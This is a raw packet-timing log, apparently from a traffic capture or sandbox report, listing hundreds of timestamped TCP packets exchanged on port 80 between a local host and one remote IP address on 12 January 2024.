                                                          Jan 12, 2024 23:12:25.632227898 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.632261038 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.632276058 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.632333040 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.632535934 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.632608891 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.632648945 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.632714033 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.632960081 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.633028984 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.633074045 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.633125067 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.633301973 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.633356094 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.633414030 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.633476973 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.633722067 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.633790970 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.633793116 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.633851051 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634157896 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634190083 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634207964 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634248972 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634260893 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634316921 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634449959 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634510994 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634524107 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634596109 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634721994 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634780884 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.634831905 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.634896994 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.635216951 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.635289907 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.635329962 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.635394096 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.635641098 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.635698080 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.635791063 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.635871887 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636101007 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.636176109 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636415958 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.636447906 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.636477947 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636516094 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636523008 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.636576891 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636637926 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.636696100 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636749029 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.636815071 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.636943102 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.637010098 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.637053967 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.637123108 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.637283087 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.637343884 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.637406111 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.637464046 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.637480974 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.637541056 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638046980 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638078928 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638108969 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638111115 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638139009 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638144016 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638179064 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638214111 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638506889 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638520956 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638552904 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638575077 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638606071 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638806105 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638856888 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.638868093 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.638911009 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639044046 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639058113 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639120102 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639343023 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639377117 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639390945 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639400005 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639429092 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639441013 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639444113 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639497042 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639543056 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639599085 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639743090 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639810085 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.639930964 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.639991999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.640245914 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.640279055 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.640301943 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.640342951 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.640361071 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.640414953 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.640477896 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.640542030 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.640701056 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.640763998 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.641060114 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.641130924 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.641345024 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.641408920 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.641582012 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.641645908 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.641871929 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.641900063 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.641932964 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.641977072 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.642137051 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.642219067 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.642231941 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.642296076 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.642553091 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.642615080 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.642698050 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.642764091 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.643007040 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.643078089 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.643136024 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.643151999 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.643202066 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.643218994 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.643506050 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.643568039 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.643698931 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.643760920 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.643821001 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.643884897 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.644030094 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.644093037 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.644263983 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.644303083 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.644332886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.644367933 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.644444942 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.644500017 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.644970894 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.645040035 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.645092964 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.645164967 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.645279884 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.645344019 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.645721912 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.645782948 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.645838022 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.645908117 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.646063089 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.646142006 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.646217108 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.646275997 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.646648884 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.646720886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.646781921 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.646797895 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.646845102 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.646873951 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.646986961 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.647042990 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.647108078 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.647176981 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.647428989 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.647490978 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.647564888 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.647627115 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.648075104 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.648089886 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.648103952 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.648139000 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.648174047 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.648318052 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.648376942 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.648540974 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.648603916 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.648958921 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.649029970 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.850625038 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.850661993 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.850693941 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.850708961 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.850780964 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.851342916 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.851376057 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.851403952 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.851491928 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.851558924 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.851591110 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.851622105 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.851716995 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.851782084 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.851845026 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.851855040 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.851912975 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.852279902 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.852355957 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.852390051 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.852447987 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.852590084 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.852646112 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.852664948 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.852719069 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.852853060 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.852905989 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.853624105 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.853653908 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.853693008 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.853710890 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.853727102 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.853759050 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.853780985 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.853790998 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.853817940 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.853841066 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.854000092 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.854060888 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.854229927 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.854286909 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.854610920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.854669094 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.854722023 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.854780912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.854913950 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.854979038 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.855065107 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.855115891 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.855412006 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.855470896 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.855560064 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.855619907 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.855756044 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.855787039 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.855809927 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.855839014 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.855978966 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.856038094 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.856322050 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.856389999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.856467962 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.856535912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.856848001 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.856878996 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.856900930 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.856944084 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.856995106 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.857053041 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.857144117 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.857193947 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.857409000 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.857466936 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.857481956 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.857539892 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.857825041 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.857856035 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.857908010 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.858149052 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.858210087 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.858222008 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.858289003 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.858330965 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.858385086 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.858483076 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.858556032 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.858684063 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.858736038 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.859111071 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.859126091 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.859186888 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860071898 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860117912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860122919 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860155106 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860205889 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860239029 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860291958 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860307932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860321999 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860394955 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860620022 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860635042 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860647917 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860661030 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860685110 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860714912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860780954 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.860846996 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.860964060 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861035109 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.861443043 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861495018 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861501932 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.861526966 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861541986 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.861578941 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.861871004 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861918926 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.861931086 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861947060 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.861994982 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862031937 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862062931 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862077951 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862112045 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862200022 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862215042 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862245083 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862258911 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862296104 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862385035 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862447023 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862556934 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862612009 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862647057 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862701893 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.862915993 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.862977982 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863050938 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863066912 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863105059 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863127947 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863423109 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863476992 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863538980 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863573074 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863599062 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863636971 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863655090 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863717079 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.863739014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.863806963 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:25.864317894 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:25.864332914 CET8049737213.248.43.48192.168.2.4
